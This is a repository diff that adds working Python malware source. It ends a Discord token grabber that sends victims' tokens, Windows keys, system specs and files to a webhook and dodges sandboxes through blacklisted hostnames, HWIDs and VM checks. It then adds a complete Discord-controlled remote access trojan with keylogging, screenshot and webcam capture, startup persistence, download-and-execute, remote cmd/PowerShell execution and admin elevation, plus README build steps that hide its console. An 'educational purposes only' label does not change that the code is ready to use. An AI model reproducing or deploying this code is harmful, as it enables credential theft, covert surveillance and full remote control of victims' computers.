PCName:{Victim_pc.replace(" ", "")}
WinKey:{wkey}
Platform:{wname}
DiskSpace:{disk}GB
Ram:{ram}GB```
'''.replace(' ', ''),
'inline': True
},
{
'name': '**Tokens:**',
'value': f'''```yaml
{tokens if tokens else "Notokensextracted"}```
'''.replace(' ', ''),
'inline': False
},
{
'name': fileCount,
'value': f'''```ini
[
{files_found.strip()}
]```
'''.replace(' ', ''),
'inline': False
}
],
'footer': {
'text': '🌟・Grabber By Rdimo・https://github.com/S1LKT0UCH/Hazard-Token-Grabber-v2'
}
}
]
}
httpx.post(self.webhook, json=embed)
with open(_zipfile, 'rb') as f:
httpx.post(self.webhook, files={'upload_file': f})
os.remove(_zipfile)
class AntiDebug(functions):
inVM = False
def __init__(self):
self.processes = list()
self.blackListedUsers = ["WDAGUtilityAccount", "Abby", "Peter Wilson", "hmarc", "patex", "JOHN-PC", "RDhJ0CNFevzX", "kEecfMwgj", "Frank",
"8Nl0ColNQ5bq", "Lisa", "John", "george", "PxmdUOpVyx", "8VizSM", "w0fjuOVmCcP5A", "lmVwjj9b", "PqONjHVwexsS", "3u2v9m8", "Julia", "HEUeRzl", ]
self.blackListedPCNames = ["BEE7370C-8C0C-4", "DESKTOP-NAKFFMT", "WIN-5E07COS9ALR", "B30F0242-1C6A-4", "DESKTOP-VRSQLAG", "Q9IATRKPRH", "XC64ZB", "DESKTOP-D019GDM", "DESKTOP-WI8CLET", "SERVER1", "LISA-PC", "JOHN-PC",
"DESKTOP-B0T93D6", "DESKTOP-1PYKP29", "DESKTOP-1Y2433R", "WILEYPC", "WORK", "6C4E733F-C2D9-4", "RALPHS-PC", "DESKTOP-WG3MYJS", "DESKTOP-7XC6GEZ", "DESKTOP-5OV9S0O", "QarZhrdBpj", "ORELEEPC", "ARCHIBALDPC", "JULIA-PC", "d1bnJkfVlH", ]
self.blackListedHWIDS = ["7AB5C494-39F5-4941-9163-47F54D6D5016", "032E02B4-0499-05C3-0806-3C0700080009", "03DE0294-0480-05DE-1A06-350700080009", "11111111-2222-3333-4444-555555555555", "6F3CA5EC-BEC9-4A4D-8274-11168F640058", "ADEEEE9E-EF0A-6B84-B14B-B83A54AFC548", "4C4C4544-0050-3710-8058-CAC04F59344A", "00000000-0000-0000-0000-AC1F6BD04972", "00000000-0000-0000-0000-000000000000", "5BD24D56-789F-8468-7CDC-CAA7222CC121", "49434D53-0200-9065-2500-65902500E439", "49434D53-0200-9036-2500-36902500F022", "777D84B3-88D1-451C-93E4-D235177420A7", "49434D53-0200-9036-2500-369025000C65",
"B1112042-52E8-E25B-3655-6A4F54155DBF", "00000000-0000-0000-0000-AC1F6BD048FE", "EB16924B-FB6D-4FA1-8666-17B91F62FB37", "A15A930C-8251-9645-AF63-E45AD728C20C", "67E595EB-54AC-4FF0-B5E3-3DA7C7B547E3", "C7D23342-A5D4-68A1-59AC-CF40F735B363", "63203342-0EB0-AA1A-4DF5-3FB37DBB0670", "44B94D56-65AB-DC02-86A0-98143A7423BF", "6608003F-ECE4-494E-B07E-1C4615D1D93C", "D9142042-8F51-5EFF-D5F8-EE9AE3D1602A", "49434D53-0200-9036-2500-369025003AF0", "8B4E8278-525C-7343-B825-280AEBCD3BCB", "4D4DDC94-E06C-44F4-95FE-33A1ADA5AC27", "79AF5279-16CF-4094-9758-F88A616D81B4", ]
for func in [self.listCheck, self.registryCheck, self.specsCheck]:
process = threading.Thread(target=func, daemon=True)
self.processes.append(process)
process.start()
for t in self.processes:
try:
t.join()
except RuntimeError:
continue
def programExit(self):
self.__class__.inVM = True
def programKill(self, proc):
try:
os.system(f"taskkill /F /T /IM {proc}")
except (PermissionError, InterruptedError, ChildProcessError, ProcessLookupError):
pass
def listCheck(self):
for path in [r'D:\Tools', r'D:\OS2', r'D:\NT3X']:
if os.path.exists(path):
self.programExit()
for user in self.blackListedUsers:
if Victim == user:
self.programExit()
for pcName in self.blackListedPCNames:
if Victim_pc == pcName:
self.programExit()
try:
myHWID = subprocess.check_output(
r"wmic csproduct get uuid", creationflags=0x08000000).decode().split('\n')[1].strip()
except Exception:
myHWID = ""
for hwid in self.blackListedHWIDS:
if myHWID == hwid:
self.programExit()
def specsCheck(self):
ram = str(psutil.virtual_memory()[0]/1024 ** 3).split(".")[0]
if int(ram) <= 3: # 3gb or less ram
self.programExit()
disk = str(psutil.disk_usage('/')[0]/1024 ** 3).split(".")[0]
if int(disk) <= 50: # 50gb or less disc space
self.programExit()
if int(psutil.cpu_count()) <= 1: # 1 or less cpu cores
self.programExit()
def registryCheck(self):
reg1 = os.system(
"REG QUERY HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Class\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\0000\\DriverDesc 2> nul")
reg2 = os.system(
"REG QUERY HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Class\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\0000\\ProviderName 2> nul")
if (reg1 and reg2) != 1:
self.programExit()
handle = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE,
'SYSTEM\\CurrentControlSet\\Services\\Disk\\Enum')
try:
reg_val = winreg.QueryValueEx(handle, '0')[0]
if ("VMware" or "VBOX") in reg_val:
self.programExit()
finally:
winreg.CloseKey(handle)
if __name__ == "__main__" and os.name == "nt":
asyncio.run(Hazard_Token_Grabber_V2().init())

160
Knight-Discord-Remote-Access-Trojan/.gitignore vendored Normal file
View File

@@ -0,0 +1,160 @@
# Byte-compiled / optimized / DLL files
__pycache__/
*.py[cod]
*$py.class
# C extensions
*.so
# Distribution / packaging
.Python
build/
develop-eggs/
dist/
downloads/
eggs/
.eggs/
lib/
lib64/
parts/
sdist/
var/
wheels/
share/python-wheels/
*.egg-info/
.installed.cfg
*.egg
MANIFEST
# PyInstaller
# Usually these files are written by a python script from a template
# before PyInstaller builds the exe, so as to inject date/other infos into it.
*.manifest
*.spec
# Installer logs
pip-log.txt
pip-delete-this-directory.txt
# Unit test / coverage reports
htmlcov/
.tox/
.nox/
.coverage
.coverage.*
.cache
nosetests.xml
coverage.xml
*.cover
*.py,cover
.hypothesis/
.pytest_cache/
cover/
# Translations
*.mo
*.pot
# Django stuff:
*.log
local_settings.py
db.sqlite3
db.sqlite3-journal
# Flask stuff:
instance/
.webassets-cache
# Scrapy stuff:
.scrapy
# Sphinx documentation
docs/_build/
# PyBuilder
.pybuilder/
target/
# Jupyter Notebook
.ipynb_checkpoints
# IPython
profile_default/
ipython_config.py
# pyenv
# For a library or package, you might want to ignore these files since the code is
# intended to run in multiple environments; otherwise, check them in:
# .python-version
# pipenv
# According to pypa/pipenv#598, it is recommended to include Pipfile.lock in version control.
# However, in case of collaboration, if having platform-specific dependencies or dependencies
# having no cross-platform support, pipenv may install dependencies that don't work, or not
# install all needed dependencies.
#Pipfile.lock
# poetry
# Similar to Pipfile.lock, it is generally recommended to include poetry.lock in version control.
# This is especially recommended for binary packages to ensure reproducibility, and is more
# commonly ignored for libraries.
# https://python-poetry.org/docs/basic-usage/#commit-your-poetrylock-file-to-version-control
#poetry.lock
# pdm
# Similar to Pipfile.lock, it is generally recommended to include pdm.lock in version control.
#pdm.lock
# pdm stores project-wide configurations in .pdm.toml, but it is recommended to not include it
# in version control.
# https://pdm.fming.dev/#use-with-ide
.pdm.toml
# PEP 582; used by e.g. github.com/David-OConnor/pyflow and github.com/pdm-project/pdm
__pypackages__/
# Celery stuff
celerybeat-schedule
celerybeat.pid
# SageMath parsed files
*.sage.py
# Environments
.env
.venv
env/
venv/
ENV/
env.bak/
venv.bak/
# Spyder project settings
.spyderproject
.spyproject
# Rope project settings
.ropeproject
# mkdocs documentation
/site
# mypy
.mypy_cache/
.dmypy.json
dmypy.json
# Pyre type checker
.pyre/
# pytype static type analyzer
.pytype/
# Cython debug symbols
cython_debug/
# PyCharm
# JetBrains specific template is maintained in a separate JetBrains.gitignore that can
# be found at https://github.com/github/gitignore/blob/main/Global/JetBrains.gitignore
# and can be added to the global gitignore or merged into this file. For a more nuclear
# option (not recommended) you can uncomment the following to ignore the entire idea folder.
#.idea/

21
Knight-Discord-Remote-Access-Trojan/LICENSE Normal file
View File

@@ -0,0 +1,21 @@
MIT License
Copyright (c) 2024 gumbobr0t
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.

24
Knight-Discord-Remote-Access-Trojan/README.md Normal file
View File

@@ -0,0 +1,24 @@
# Knight-RAT
Discord Remote Administration Tool
⚠️ **Educational Purposes Only!**
Prerequisites:
- python 3.9-10
**Do not forget to add it to path!**
Setup:
- `pip install -r requirements.txt`
- Edit this config in the knight.py:
```py
### CONFIG
btoken = '' ### REQUIRED | DISCORD BOT TOKEN NEEDS TO BE PUT HERE FOR THE RAT TO WORK
prefix = '' ### OPTIONAL | IGNORE THIS IF YOU WANT TO RUN COMMANDS WITHOUT A PREFIX | PREFIX THE DISCORD BOT WILL BE CALLED WITH
userid = '' ### OPTIONAL | IGNORE THIS IF YOU DON'T WANT TO BE PINGED | ONLY WORKS WITH CHANNELID SET | THIS IS THE USER WHO WILL BE NOTIFIED ABOUT NEW CLIENTS WITH A PING
channelid = '' ### OPTIONAL | ONLY SET IF YOU WANT TO GET A MESSAGE WHEN NEW CLIENTS GET ONLINE
```
**Make sure you have all intents on the bot enabled and the bot on your server.**
- `pyinstaller --noconsole --onefile knight.py --clean`
## Execute >help, .help or whatever your prefix is to see all commands. This was a fun project which wont receive updates anymore now. (probably). Some commands dont work. Explaination on how the Id system works is [here](https://github.com/rose-dll/Rose-Stealer/blob/main/docs/KNIGHT.md).

BIN
Knight-Discord-Remote-Access-Trojan/assets/Knight.ico Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 249 KiB

BIN
Knight-Discord-Remote-Access-Trojan/assets/Knight.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 6.3 MiB

498
Knight-Discord-Remote-Access-Trojan/knight.py Normal file
View File

@@ -0,0 +1,498 @@
import discord
import sys
import os
import random
import socket
import webbrowser
import ctypes
import subprocess
import pygame
import pygame.camera
import requests
import win32con
import keyboard
import time
import shutil
from sys import argv
from PIL import ImageGrab
from discord.ext import commands
### CONFIG
btoken = '' ### REQUIRED | DISCORD BOT TOKEN NEEDS TO BE PUT HERE FOR THE RAT TO WORK
prefix = '' ### OPTIONAL | IGNORE THIS IF YOU WANT TO RUN COMMANDS WITHOUT A PREFIX | PREFIX THE DISCORD BOT WILL BE CALLED WITH
userid = '' ### OPTIONAL | IGNORE THIS IF YOU DON'T WANT TO BE PINGED | ONLY WORKS WITH CHANNELID SET | THIS IS THE USER WHO WILL BE NOTIFIED ABOUT NEW CLIENTS WITH A PING
channelid = '' ### OPTIONAL | ONLY SET IF YOU WANT TO GET A MESSAGE WHEN NEW CLIENTS GET ONLINE
### DEV CONFIG
pygame.camera.init()
dscrd = 'https://discord.gg/rHdqqqYVzY'
roaming = os.getenv("appdata")
startup_loc = os.path.join(roaming, "Microsoft", "Windows", "Start Menu", "Programs", "Startup")
changed = win32con.SPIF_UPDATEINIFILE | win32con.SPIF_SENDCHANGE
hostname = socket.gethostname()
cwd = os.getcwd()
intents = discord.Intents.all()
bot = commands.Bot(description=f"Running Knight Remote Adminstration Tool.", command_prefix=prefix, intents=intents)
clientid = ''.join(random.choice('0123456789') for i in range(6))
def get_random_string(length):
letters = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'
global result_str
result_str = ''.join(random.choice(letters) for i in range(length))
if channelid == '':
pass
else:
@bot.event
async def on_ready():
usrmention = f'<@{userid}>'
channel = bot.get_channel(int(channelid))
if userid == '':
await channel.send(f"New client online: process {clientid}")
else:
await channel.send(f"{usrmention} | New client online: process {clientid}")
@bot.command(name='open')
async def open(ctx, inputid, fpath):
if inputid == clientid:
try:
os.system(fpath)
await ctx.send(f'Successfully ran file with the path `{fpath}` for process {clientid}.')
except Exception:
await ctx.send(f'Couldn\'t run file with the path `{fpath}` for process {clientid} because of `{Exception}`.')
if inputid != clientid:
if inputid == 'all':
try:
os.system(fpath)
await ctx.send(f'Successfully ran file with the path `{fpath}` for process {clientid}.')
except Exception:
await ctx.send(f'Couldn\'t run file with the path `{fpath}` for process {clientid} because of `{Exception}`.')
if inputid != 'all' and clientid:
await ctx.send(f'Sorry, couldn\'t find process {inputid}.')
@bot.command(name='taskschd')
async def taskschd(ctx, inputid):
if inputid == clientid:
try:
os.system('taskschd.msc')
await ctx.send(f'Successfully started windows task scheduler for process {clientid}.')
except Exception:
await ctx.send(f'Couldn\'t start windows task scheduler for process {clientid} because of `{Exception}`.')
if inputid != clientid:
if inputid == 'all':
try:
os.system('taskschd.msc')
await ctx.send(f'Successfully started windows task scheduler for process {clientid}.')
except Exception:
await ctx.send(f'Couldn\'t start windows task scheduler for process {clientid} because of `{Exception}`.')
if inputid != 'all' and clientid:
await ctx.send(f'Sorry, couldn\'t find process {inputid}.')
@bot.command(name='keylogger')
async def keylogger(ctx, inputid, duration):
if inputid == clientid:
get_random_string(15)
record_time = duration ### DURATION OF KEYLOGGER IN SECONDS
fname = f'keylogger_finaldata_CLIENTID_{clientid}_{result_str}{duration}.txt'
end_time = time.monotonic() + int(record_time)
recorded = []
try:
await ctx.send(f'Started keylogger for process {clientid} with a duration of `{duration}` seconds without any problems. You will be notified in `{duration}` seconds, when the final data is being posted.')
while True:
if time.monotonic() >= end_time:
break
recorded.append(keyboard.read_event())
except KeyboardInterrupt:
await ctx.send(f'Keylogger was killed by secret keystroke for process {clientid} because of `{Exception}`. Exe has been compiled without `--noconsole` probably.')
pass
except Exception:
await ctx.send(f'Couldn\'t start keylogger for process {clientid} because of `{Exception}`.')
with open(fname, 'w') as f:
for keystroke in recorded:
if keystroke.event_type == 'down':
if str('up') in str(keystroke):
str(keystroke).upper()
if str('down') in str(keystroke):
str(keystroke).lower()
f.write(str(f'''{keystroke}
'''.replace('KeyboardEvent', '').replace('(', '').replace(')', '').replace(' up', '').replace(' down', '')))
await ctx.send(file=discord.File(fname))
await ctx.send(f'Keylogger data file `{fname}` from process {clientid} was sent.')
os.remove(fname)
if inputid != clientid:
if inputid == 'all':
get_random_string(15)
record_time = duration ### DURATION OF KEYLOGGER IN SECONDS
fname = f'keylogger_finaldata_CLIENTID_{clientid}_{result_str}{duration}.txt'
end_time = time.monotonic() + int(record_time)
recorded = []
try:
await ctx.send(f'Started keylogger for process {clientid} with a duration of `{duration}` seconds without any problems. You will be notified in `{duration}` seconds, when the final data is being posted.')
while True:
if time.monotonic() >= end_time:
break
recorded.append(keyboard.read_event())
except KeyboardInterrupt:
await ctx.send(f'Keylogger was killed by secret keystroke for process {clientid} because of `{Exception}`. Exe has been compiled without `--noconsole` probably.')
pass
except Exception:
await ctx.send(f'Couldn\'t start keylogger for process {clientid} because of `{Exception}`.')
with open(fname, 'w') as f:
for keystroke in recorded:
if keystroke.event_type == 'down':
if str('up') in str(keystroke):
str(keystroke).upper()
if str('down') in str(keystroke):
str(keystroke).lower()
f.write(str(f'''{keystroke}
'''.replace('KeyboardEvent', '').replace('(', '').replace(')', '').replace(' up', '').replace(' down', '')))
await ctx.send(file=discord.File(fname))
await ctx.send(f'Keylogger data file `{fname}` from process {clientid} was sent.')
os.remove(fname)
if inputid != 'all' and clientid:
await ctx.send(f'Sorry, couldn\'t find process {inputid}.')
@bot.command(name='msgbox')
async def msgbox(ctx, inputid, title, msg):
if inputid == clientid:
emojis = ['', '']
prmtn = await ctx.send(f'Final message box is ready to be sent to process {clientid}. Are we allowed to promote Knight Remote Adminstration Tool a little with it?')
for emoji in emojis:
await prmtn.add_reaction(emoji)
@bot.event
async def on_reaction_add(reaction, user):
MB_OK = 0x0 ### BUTTON
ICON_EXCLAIM = 0x30 ### ICON
emoji = reaction.emoji
if user.bot:
return
if emoji == '':
try:
ctypes.windll.user32.MessageBoxW(0, str(f'Join the Discord server: {dscrd} | Individual user message: ' + msg), str('Your PC is infected by Knight Remote Adminstration Tool! | Individual user title: ' + title), MB_OK | ICON_EXCLAIM) ### FINAL MSGBOX WITH PROMOTION
await ctx.send(f'Successfully showed message box with promotion for process {clientid}.')
except Exception:
await ctx.send(f'Couldn\'t show message box for process {clientid} because of `{Exception}`.')
return
elif emoji == '':
try:
ctypes.windll.user32.MessageBoxW(0, str(msg), str(title), MB_OK | ICON_EXCLAIM) ### FINAL MSGBOX WITHOUT PROMOTION
await ctx.send(f'Successfully showed message box without promotion for process {clientid}.')
except Exception:
await ctx.send(f'Couldn\'t show message box for process {clientid} because of `{Exception}`.')
return
else:
return
if inputid != clientid:
if inputid == 'all':
emojis = ['', '']
prmtn = await ctx.send(f'Final message box is ready to be sent to process {clientid}. Are we allowed to promote Knight Remote Adminstration Tool a little with it?')
for emoji in emojis:
await prmtn.add_reaction(emoji)
@bot.event
async def on_reaction_add(reaction, user):
MB_OK = 0x0 ### BUTTON
ICON_EXCLAIM = 0x30 ### ICON
emoji = reaction.emoji
if user.bot:
return
if emoji == '':
try:
ctypes.windll.user32.MessageBoxW(0, str(f'Join the Discord server: {dscrd} | Individual user message: ' + msg), str('Your PC is infected by Knight Remote Adminstration Tool! | Individual user title: ' + title), MB_OK | ICON_EXCLAIM) ### FINAL MSGBOX WITH PROMOTION
await ctx.send(f'Successfully showed message box with promotion for process {clientid}.')
except Exception:
await ctx.send(f'Couldn\'t show message box for process {clientid} because of `{Exception}`.')
return
elif emoji == '':
try:
ctypes.windll.user32.MessageBoxW(0, str(msg), str(title), MB_OK | ICON_EXCLAIM) ### FINAL MSGBOX WITHOUT PROMOTION
await ctx.send(f'Successfully showed message box without promotion for process {clientid}.')
except Exception:
await ctx.send(f'Couldn\'t show message box for process {clientid} because of `{Exception}`.')
return
else:
return
if inputid != 'all' and clientid:
await ctx.send(f'Sorry, couldn\'t find process {inputid}.')
@bot.command(name='screenshot')
async def screenshot(ctx, inputid):
if inputid == clientid:
image = ImageGrab.grab(
bbox=None,
include_layered_windows=False,
all_screens=True,
xdisplay=None
)
fname = f'screenshot_{clientid}.png'
image.save(fname)
await ctx.send(file=discord.File(fname))
await ctx.send(f'Screenshot `{fname}` from process {clientid} was sent.')
os.remove(fname)
if inputid != clientid:
if inputid == 'all':
image = ImageGrab.grab(
bbox=None,
include_layered_windows=False,
all_screens=True,
xdisplay=None
)
fname = f'screenshot_{clientid}.png'
image.save(fname)
await ctx.send(file=discord.File(fname))
await ctx.send(f'Screenshot `{fname}` from process {clientid} was sent.')
os.remove(fname)
if inputid != 'all' and clientid:
await ctx.send(f'Sorry, couldn\'t find process {inputid}.')
@bot.command(name='startup')
async def startup(ctx, inputid):
if inputid == clientid:
try:
shutil.copy(argv[0], startup_loc)
await ctx.send(f'Successfully copied file `{argv[0]}` from process {clientid} to `{startup_loc}`.')
except Exception:
await ctx.send(f'Failed to copy file `{argv[0]}` from process {clientid} to `{startup_loc}`.')
if inputid != clientid:
if inputid == 'all':
try:
shutil.copy(argv[0], startup_loc)
await ctx.send(f'Successfully copied file `{argv[0]}` from process {clientid} to `{startup_loc}`.')
except Exception:
await ctx.send(f'Failed to copy file `{argv[0]}` from process {clientid} to `{startup_loc}`.')
if inputid != 'all' and clientid:
await ctx.send(f'Sorry, couldn\'t find process {inputid}.')
@bot.command(name='upload')
async def upload(ctx, inputid, dwnldlink, filetype): ### PUT FILE TYPES LIKE .png, .exe, .msi, .txt AND MORE THERE WHEN USING THE COMMAND
if inputid == clientid:
get_random_string(15)
r = requests.get(dwnldlink, allow_redirects=False)
fname = f'filedwnldfrweb_CLIENTID_{clientid}_{result_str}{filetype}'
open(fname, 'wb').write(r.content)
emojis = ['', '']
msg = await ctx.send(f'Downloaded file `{dwnldlink}` with the filetype `{filetype}` to process {clientid}. Should the file be executed directly?')
for emoji in emojis:
await msg.add_reaction(emoji)
@bot.event
async def on_reaction_add(reaction, user):
emoji = reaction.emoji
if user.bot:
return
if emoji == '':
try:
os.system(fname)
await ctx.send(f'Successfully executed scraped file `{dwnldlink}` with the filetype `{filetype}` for process {clientid}.')
except Exception:
await ctx.send(f'Couldn\'t execute scraped file `{dwnldlink}` with the filetype `{filetype}` for process {clientid} because of `{Exception}`.')
return
elif emoji == '':
await ctx.send(f'Okay, scraped file `{dwnldlink}` with the filetype `{filetype}` is not going to be executed for process {clientid}.')
return
else:
return
if inputid != clientid:
if inputid == 'all':
get_random_string(15)
r = requests.get(dwnldlink, allow_redirects=False)
fname = f'filedwnldfrweb_CLIENTID_{clientid}_{result_str}{filetype}'
open(fname, 'wb').write(r.content)
emojis = ['', '']
msg = await ctx.send(f'Downloaded file `{dwnldlink}` with the filetype `{filetype}` to process {clientid}. Should the file be executed directly?')
for emoji in emojis:
await msg.add_reaction(emoji)
@bot.event
async def on_reaction_add(reaction, user):
emoji = reaction.emoji
if user.bot:
return
if emoji == '':
try:
os.system(fname)
await ctx.send(f'Successfully executed scraped file `{dwnldlink}` with the filetype `{filetype}` for process {clientid}.')
except Exception:
await ctx.send(f'Couldn\'t execute scraped file `{dwnldlink}` with the filetype `{filetype}` for process {clientid} because of `{Exception}`.')
return
elif emoji == '':
await ctx.send(f'Okay, scraped file `{dwnldlink}` with the filetype `{filetype}` is not going to be executed for process {clientid}.')
return
else:
return
if inputid != 'all' and clientid:
await ctx.send(f'Sorry, couldn\'t find process {inputid}.')
@bot.command(name='wallpaper')
async def wallpaper(ctx, inputid, rawimg):
if inputid == clientid:
r = requests.get(rawimg, allow_redirects=False)
fname = f'newwallpaper_{clientid}.jpg' ### ONLY .jpg IMAGES
open(fname, 'wb').write(r.content)
path = os.path.abspath(fname)
ctypes.windll.user32.SystemParametersInfoW(win32con.SPI_SETDESKWALLPAPER, 0, path, changed)
await ctx.send(f'Changed background wallpaper for {clientid} to `{rawimg}`.')
os.remove(fname)
if inputid != clientid:
if inputid == 'all':
r = requests.get(rawimg, allow_redirects=False)
fname = f'newwallpaper_{clientid}.jpg' ### ONLY .jpg IMAGES
open(fname, 'wb').write(r.content)
path = os.path.abspath(fname)
ctypes.windll.user32.SystemParametersInfoW(win32con.SPI_SETDESKWALLPAPER, 0, path, changed)
await ctx.send(f'Changed background wallpaper for {clientid} to `{rawimg}`.')
os.remove(fname)
if inputid != 'all' and clientid:
await ctx.send(f'Sorry, couldn\'t find process {inputid}.')
@bot.command(name='webcam')
async def webcam(ctx, inputid):
if inputid == clientid:
camlist = pygame.camera.list_cameras()
fname = str(f'webcampicture_{clientid}.png')
if camlist:
cam = pygame.camera.Camera(camlist[0], (640, 480))
cam.start()
image = cam.get_image()
pygame.image.save(image, fname)
await ctx.send(file=discord.File(fname))
await ctx.send(f'Webcam picture `{fname}` from process {clientid} was sent.')
os.remove(fname)
else:
await ctx.send(f'No camera was found for process {clientid}.')
if inputid != clientid:
if inputid == 'all':
camlist = pygame.camera.list_cameras()
fname = str(f'webcampicture_{clientid}.png')
if camlist:
cam = pygame.camera.Camera(camlist[0], (640, 480))
cam.start()
image = cam.get_image()
pygame.image.save(image, fname)
await ctx.send(file=discord.File(fname))
await ctx.send(f'Webcam picture `{fname}` from process {clientid} was sent.')
os.remove(fname)
else:
await ctx.send(f'No camera was found for process {clientid}.')
if inputid != 'all' and clientid:
await ctx.send(f'Sorry, couldn\'t find process {inputid}.')
@bot.command(name='tasklist')
async def tasklist(ctx, inputid):
if inputid == clientid:
tasks = str(subprocess.check_output('tasklist', shell=True))
fname = f'runningtasks_{clientid}.txt'
with open(fname, 'w') as f:
f.write(tasks)
await ctx.send(file=discord.File(fname))
await ctx.send(f'Wrote all current tasks from process {clientid} to `{fname}`.')
os.remove(fname)
if inputid != clientid:
if inputid == 'all':
tasks = str(subprocess.check_output('tasklist', shell=True))
fname = f'runningtasks_{clientid}.txt'
with open(fname, 'w') as f:
f.write(tasks)
await ctx.send(file=discord.File(fname))
await ctx.send(f'Wrote all current tasks from process {clientid} to `{fname}`.')
os.remove(fname)
if inputid != 'all' and clientid:
await ctx.send(f'Sorry, couldn\'t find process {inputid}.')
@bot.command(name='killprocess')
async def killprocess(ctx, inputid, procname):
if inputid == clientid:
subprocess.run(f'taskkill /f /im {procname}', shell=True)
await ctx.send(f'Initiated to kill process `{procname}` for client {clientid}.')
if inputid != clientid:
if inputid == 'all':
subprocess.run(f'taskkill /f /im {procname}', shell=True)
await ctx.send(f'Initiated to kill process `{procname}` for client {clientid}.')
if inputid != 'all' and clientid:
await ctx.send(f'Sorry, couldn\'t find process {inputid}.')
@bot.command(name='excshell')
async def shell(ctx, inputid, cmd):
if inputid == clientid:
subprocess.run(f'start cmd /f /c {cmd}', shell=True)
await ctx.send(f'Executed cmd command `{cmd}` for process {clientid}.')
if inputid != clientid:
if inputid == 'all':
subprocess.run(f'start cmd /f /c {cmd}', shell=True)
await ctx.send(f'Executed cmd command `{cmd}` for process {clientid}.')
if inputid != 'all' and clientid:
await ctx.send(f'Sorry, couldn\'t find process {inputid}.')
@bot.command(name='excpowershell')
async def powershell(ctx, inputid, shllcmd):
if inputid == clientid:
subprocess.run(f'start powershell /c {shllcmd}', shell=True)
await ctx.send(f'Executed shell command `{shllcmd}` for process {clientid}.')
if inputid != clientid:
if inputid == 'all':
subprocess.run(f'start powershell /c {shllcmd}', shell=True)
await ctx.send(f'Executed shell command `{shllcmd}` for process {clientid}.')
if inputid != 'all' and clientid:
await ctx.send(f'Sorry, couldn\'t find process {inputid}.')
@bot.command(name='isadmin')
async def isadmin(ctx, inputid):
if inputid == clientid:
isadmin = ctypes.windll.shell32.IsUserAnAdmin()
if isadmin:
await ctx.send(f'Process {clientid} **is** admin.')
if not isadmin:
await ctx.send(f'Process {clientid} **is not** admin.')
if inputid != clientid:
if inputid == 'all':
isadmin = ctypes.windll.shell32.IsUserAnAdmin()
if isadmin:
await ctx.send(f'Process {clientid} **is** admin.')
if not isadmin:
await ctx.send(f'Process {clientid} **is not** admin.')
if inputid != 'all' and clientid:
await ctx.send(f'Sorry, couldn\'t find process {inputid}.')
@bot.command(name='getadmin')
async def getadmin(ctx, inputid):
if inputid == clientid:
ctypes.windll.shell32.ShellExecuteW(None, "runas", sys.executable, " ".join(sys.argv), None, 1)
await ctx.send(f'Requested admin access for process {clientid}.')
sys.exit(0)
if inputid != clientid:
if inputid == 'all':
ctypes.windll.shell32.ShellExecuteW(None, "runas", sys.executable, " ".join(sys.argv), None, 1)
await ctx.send(f'Requested admin access for process {clientid}.')
sys.exit(0)
if inputid != 'all' and clientid:
await ctx.send(f'Sorry, couldn\'t find process {inputid}.')
@bot.command(name='quit')
async def quit(ctx, inputid):
if inputid == clientid:
await ctx.send(f'Terminated Knight Remote Adminstration Tool for {clientid}.')
sys.exit(0)
if inputid != clientid:
if inputid == 'all':
await ctx.send(f'Terminated Knight Remote Adminstration Tool for {clientid}.')
sys.exit(0)
if inputid != 'all' and clientid:
await ctx.send(f'Sorry, couldn\'t find process {inputid}.')
@bot.command(name='clients')
async def clients(ctx):
await ctx.send(f'{hostname} - {clientid}.')
@bot.command(name='browser')
async def browser(ctx, inputid, url):
if inputid == clientid:
webbrowser.open(url)
await ctx.send(f'Opened webbrowser `{url}` for process {clientid}.')
if inputid != clientid:
if inputid == 'all':
webbrowser.open(url)
await ctx.send(f'Opened webbrowser `{url}` for process {clientid}.')
if inputid != 'all' and clientid:
await ctx.send(f'Sorry, couldn\'t find process {inputid}.')
bot.run(btoken)

5
Knight-Discord-Remote-Access-Trojan/requirements.txt Normal file
View File

@@ -0,0 +1,5 @@
pygame>=2.5.0
discord.py>=2.3.0
Pillow>=9.5.0
keyboard>=0.13.5
pyinstaller>=5.13.0

160
PyAnalyzer-UnpackStealers/.gitignore vendored Normal file
View File

@@ -0,0 +1,160 @@
# Byte-compiled / optimized / DLL files
__pycache__/
*.py[cod]
*$py.class
# C extensions
*.so
# Distribution / packaging
.Python
build/
develop-eggs/
dist/
downloads/
eggs/
.eggs/
lib/
lib64/
parts/
sdist/
var/
wheels/
share/python-wheels/
*.egg-info/
.installed.cfg
*.egg
MANIFEST
# PyInstaller
# Usually these files are written by a python script from a template
# before PyInstaller builds the exe, so as to inject date/other infos into it.
*.manifest
*.spec
# Installer logs
pip-log.txt
pip-delete-this-directory.txt
# Unit test / coverage reports
htmlcov/
.tox/
.nox/
.coverage
.coverage.*
.cache
nosetests.xml
coverage.xml
*.cover
*.py,cover
.hypothesis/
.pytest_cache/
cover/
# Translations
*.mo
*.pot
# Django stuff:
*.log
local_settings.py
db.sqlite3
db.sqlite3-journal
# Flask stuff:
instance/
.webassets-cache
# Scrapy stuff:
.scrapy
# Sphinx documentation
docs/_build/
# PyBuilder
.pybuilder/
target/
# Jupyter Notebook
.ipynb_checkpoints
# IPython
profile_default/
ipython_config.py
# pyenv
# For a library or package, you might want to ignore these files since the code is
# intended to run in multiple environments; otherwise, check them in:
# .python-version
# pipenv
